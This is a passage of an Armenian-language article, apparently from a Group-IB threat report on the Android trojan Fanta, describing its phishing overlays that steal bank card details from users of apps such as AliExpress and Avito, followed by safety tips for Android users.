• Fanta-ն ֆիշինգի պատուհաններ է ստեղծում բանկային քարտերի մասին տեղեկություններ մուտքագրելու ձևերով, եթե գործարկվի մոտ 30 տարբեր ինտերնետային ծառայություններ ցանկից հավելված: Դրանց թվում են՝ AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto և այլն:
  

  Ֆիշինգի ձևեր

  Fanta-ն վերլուծում է, թե որ հավելվածներն են աշխատում վարակված սարքի վրա։ Եթե ​​հետաքրքրության հայտ է բացվել, տրոյականը բոլոր մյուսների վրա ցուցադրում է ֆիշինգի պատուհան, որը բանկային քարտի տեղեկությունները մուտքագրելու ձև է: Օգտագործողը պետք է մուտքագրի հետևյալ տվյալները.

  • Քարտի համար
  • Քարտի ժամկետի ավարտը
  • CVV
  • Քարտատիրոջ անունը (ոչ բոլոր բանկերի համար)

  Կախված գործող հավելվածից, կցուցադրվեն ֆիշինգի տարբեր պատուհաններ: Ստորև բերված են դրանցից մի քանիսի օրինակներ.

  AliExpress:

  
  Ավիտո:

  
  Որոշ այլ ծրագրերի համար, օրինակ. Google Play Market, Aviasales, Pandao, Booking, Trivago:
  

  Ինչպես էր դա իրականում
  

  Բարեբախտաբար, հոդվածի սկզբում նկարագրված SMS հաղորդագրությունը ստացած անձը պարզվեց, որ կիբերանվտանգության մասնագետ է։ Հետևաբար, իրական, ոչ ռեժիսորական տարբերակը տարբերվում է ավելի վաղ ասվածից. մարդը ստացել է հետաքրքիր SMS, որից հետո այն տվել է Group-IB Threat Hunting Intelligence թիմին: Հարձակման արդյունքը այս հոդվածն է. Հաճելի ավարտ, չէ՞: Այնուամենայնիվ, ոչ բոլոր պատմություններն են ավարտվում այդքան հաջող, և այնպես, որ ձերը չթվա որպես ռեժիսորի կտրվածք՝ փողի կորուստով, շատ դեպքերում բավական է հետևել երկար նկարագրված հետևյալ կանոններին.

  • Android OS ունեցող շարժական սարքի համար հավելվածներ մի տեղադրեք Google Play-ից բացի այլ աղբյուրներից
  • Հավելված տեղադրելիս հատուկ ուշադրություն դարձրեք հավելվածի պահանջած իրավունքներին
  • ուշադրություն դարձրեք ներբեռնված ֆայլերի ընդարձակմանը
  • պարբերաբար տեղադրել Android OS-ի թարմացումները
  • մի այցելեք կասկածելի ռեսուրսներ և մի ներբեռնեք այնտեղից ֆայլեր
  • Մի սեղմեք SMS հաղորդագրություններում ստացված հղումների վրա:

Source: www.habr.com